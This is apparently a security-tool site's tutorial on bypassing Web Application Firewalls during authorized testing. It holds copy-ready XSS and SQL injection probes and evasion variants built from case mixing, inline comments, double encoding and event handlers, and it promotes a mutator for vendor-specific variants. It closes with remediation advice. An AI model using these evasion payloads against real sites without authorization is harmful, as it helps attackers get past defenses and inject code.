$loading...
Learn how to bypass a Web Application Firewall during authorized testing: fingerprint the WAF, find the filter boundary, then defeat it with encoding, case and comment tricks, and payload mutation. Step-by-step methodology with copy-ready examples.
Before trying to bypass anything, confirm a WAF exists and identify the vendor — each WAF (Cloudflare, Akamai, AWS WAF, Imperva, F5) has different rule sets and blind spots. Send a deliberately malicious request and watch for a block page, a 403/406/429, a generated Ray ID, or a CAPTCHA. Note the exact response so you can tell a block apart from an application error.
curl -s -o /dev/null -w '%{http_code}' 'https://target/?q=<script>alert(1)</script>'GET /?id=1' OR '1'='1 HTTP/1.1 # baseline malicious probe
Look for: cf-ray / x-akamai / x-amzn headers, Server banner, block-page wording
Isolate exactly what the WAF blocks. Submit each suspicious token on its own — a bare keyword, a single special character, an event handler — and record which ones trip the rule. The goal is to learn the smallest set of blocked tokens so you can rewrite the payload around them rather than guessing blindly.
q=script # keyword blocked?
q=onerror # event handler blocked?
q=' OR 1=1-- # SQL meta blocked?
q=%3Cscript%3E # does URL-encoding alone pass?
Most signature WAFs match on literal strings. Re-express the same payload so it no longer matches the signature but still executes after the application decodes it: mixed case, inline comments, double/Unicode/HTML encoding, and whitespace alternatives. Chain transforms in the Encoding Pipeline to test layered encodings the WAF normalizes inconsistently.
<ScRiPt>alert(1)</ScRiPt> # case variation
<img src=x onerror=alert`1`> # backtick call, no parens
1/**/UNION/**/SELECT/**/1,2,3-- # inline comments split keywords
%2553cript -> %53cript -> Script # double URL-encoding
<svg/onload=alert(1)> # slash instead of space
A single hand-crafted variant rarely lands on the first try. Generate dozens of mutations from one payload and replay them to find the one that slips through, then narrow to encodings that target your fingerprinted vendor. The Payload Mutator produces 50+ evasion variants; the WAF-Specific Encoder tailors output to 8 named WAFs.
Feed " OR 1=1-- " into the Payload Mutator -> replay all variants
Select the Cloudflare / Akamai / AWS profile in the WAF Encoder
Keep the first variant that returns the app response, not the block page
A request that is not blocked is not the same as a working exploit — confirm the payload actually executes (script fires, query returns injected data) before reporting. Record the exact bypass string, the WAF vendor, and the rule it evaded so the finding is reproducible. Recommend defense-in-depth: positive-security input validation and context-aware output encoding behind the WAF, never the WAF alone.
Verify: reflected payload executes / SQL returns injected column data
Document: vendor, blocked baseline, working bypass, decoded payload
Fix: validate + encode server-side; treat the WAF as one layer, not the control
Level up your security testing
Install the CLI
npx payload-playgroundExplore All Tools
Encoding, hashing, JWT & more
Browse Cheat Sheets
Quick-reference payload guides